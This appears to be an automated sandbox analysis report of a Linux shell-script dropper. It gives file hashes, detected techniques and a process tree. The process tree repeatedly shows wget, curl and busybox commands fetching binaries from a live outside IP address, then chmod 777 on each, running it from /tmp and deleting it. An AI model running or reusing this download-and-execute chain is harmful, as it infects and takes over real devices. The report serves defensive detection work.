Analysis
-
max time kernel
30s -
max time network
57s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20/11/2024, 03:14
Static task
static1
Behavioral task
behavioral1
Sample
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
-
Size
10KB
-
MD5
45b72c6c039a3d67373f15957984b0e7
-
SHA1
8eb92a8fd6c526682b007d3c8fd7906f1516c6ae
-
SHA256
ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2
-
SHA512
d8608a7803cb7783e729069dd99b25a75e4a730d130b624f1cf604a17ac9d1fe65fd00563d154b9c02e552d8c8324832be6cebbbd8c9eb96f4a92cf3959dfd50
-
SSDEEP
192:mN1RZ53Z5G7VlVNVYTn177f0adFIG6PrPU7FtTlMc2McqMcycXcHcuPbj9lx7x4M:BScGbEdG2d+SXBG2d+S3Z
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 880 chmod 681 chmod 775 chmod 799 chmod 848 chmod 861 chmod 886 chmod 907 chmod 691 chmod 746 chmod 783 chmod 829 chmod 855 chmod 892 chmod 898 chmod 697 chmod 714 chmod 816 chmod 835 chmod 841 chmod 868 chmod 874 chmod 729 chmod 767 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG 683 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx 692 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm 698 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG 716 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia 731 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C 747 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg 768 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq 776 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9 784 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9 /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu 800 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr 817 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR 830 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN 836 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f 842 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f 849 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx 856 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm 862 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG 869 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg 875 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq 881 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG 887 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia 893 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C 899 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR 908 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR -
Checks CPU configuration 1 TTPs 24 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 910 wget 832 wget 833 curl 834 busybox 836 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN 837 rm -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR curl File opened for modification /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN curl File opened for modification /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq curl File opened for modification /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR curl File opened for modification /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C curl File opened for modification /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9 curl File opened for modification /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr curl File opened for modification /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f curl File opened for modification /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx curl File opened for modification /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG curl File opened for modification /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia curl File opened for modification /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg curl File opened for modification /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG curl File opened for modification /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG curl File opened for modification /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia curl File opened for modification /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg curl File opened for modification /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq curl File opened for modification /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu curl File opened for modification /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG curl File opened for modification /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx curl File opened for modification /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm curl File opened for modification /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f curl File opened for modification /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm curl File opened for modification /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C curl
Processes
-
/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:655
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:657
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:678
-
-
/bin/chmodchmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:684
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:690
-
-
/bin/chmodchmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:693
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:696
-
-
/bin/chmodchmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- Executes dropped EXE
PID:698
-
-
/bin/rmrm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:700
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:701
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:711
-
-
/bin/chmodchmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵
- Executes dropped EXE
PID:716
-
-
/bin/rmrm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG2⤵PID:717
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:718
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:727
-
-
/bin/chmodchmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵
- Executes dropped EXE
PID:731
-
-
/bin/rmrm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:743
-
-
/bin/chmodchmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:763
-
-
/bin/chmodchmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:769
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:774
-
-
/bin/chmodchmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- File and Directory Permissions Modification
PID:775
-
-
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- Executes dropped EXE
PID:776
-
-
/bin/rmrm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵PID:780
-
-
/bin/chmodchmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX92⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵PID:786
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵PID:795
-
-
/bin/chmodchmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵PID:812
-
-
/bin/chmodchmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:828
-
-
/bin/chmodchmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- System Network Configuration Discovery
PID:832
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:836
-
-
/bin/rmrm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN2⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:840
-
-
/bin/chmodchmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:846
-
-
/bin/chmodchmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:851
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:854
-
-
/bin/chmodchmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:860
-
-
/bin/chmodchmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:867
-
-
/bin/chmodchmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:873
-
-
/bin/chmodchmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq2⤵PID:879
-
-
